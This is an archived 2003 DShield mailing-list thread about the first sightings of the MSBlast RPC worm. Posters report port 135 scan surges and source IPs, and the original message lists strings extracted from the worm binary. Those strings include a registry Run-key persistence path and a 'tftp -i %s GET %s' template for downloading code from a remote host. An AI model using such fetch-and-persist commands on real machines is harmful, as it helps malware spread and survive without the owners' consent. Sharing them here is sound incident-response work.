[Dshield] infocon: yellow

Korhonen Juuso juuso.korhonen at camline.fi
Mon Aug 11 19:23:03 GMT 2003


Confirmed from Finland also. Getting hits to 135 with rate 5/sec. Also
seeing huge increase to 137.



Best Regards

Juuso

Radiant, sir, radiant 




-----Original Message-----
From: Richard Golodner [mailto:RGolodner at Aetea.com]
Sent: 11 August 2003 22:04
To: 'General DShield Discussion List'
Subject: RE: [Dshield] infocon: yellow


We are seeing a 10x increase in scans for port 135 beginning at 1400 Eastern
Time.
Top Four Netblocks
61.43.222.214
65.30.70.92
198.142.176.27
212.27.213.168
			Richard

-----Original Message-----
From: Paul Marsh [mailto:pmarsh at nmefdn.org]
Sent: Monday, August 11, 2003 2:44 PM
To: General DShield Discussion List
Subject: RE: [Dshield] infocon: yellow


Looks like it's starting, I'm getting blasted with them.

-----Original Message-----
From: Johannes B. Ullrich [mailto:jullrich at sans.org]
Sent: Monday, August 11, 2003 2:24 PM
To: list at dshield.org
Subject: [Dshield] infocon: yellow


We just got a binary that looks very much like an
RPC worm. It scans for port 135. No real idea what it does (other than
scanning).

Strings from the file:

msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? 
 Stop making money and fix your software
windowsupdate.com

BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
tftp -i %s GET %s




-- 
SANS - Internet Storm Center
http://isc.sans.org
PGP Key: http://isc.sans.org/jullrich.txt

_______________________________________________
list mailing list
list at dshield.org
To change your subscription options (or unsubscribe), see:
http://www.dshield.org/mailman/listinfo/list
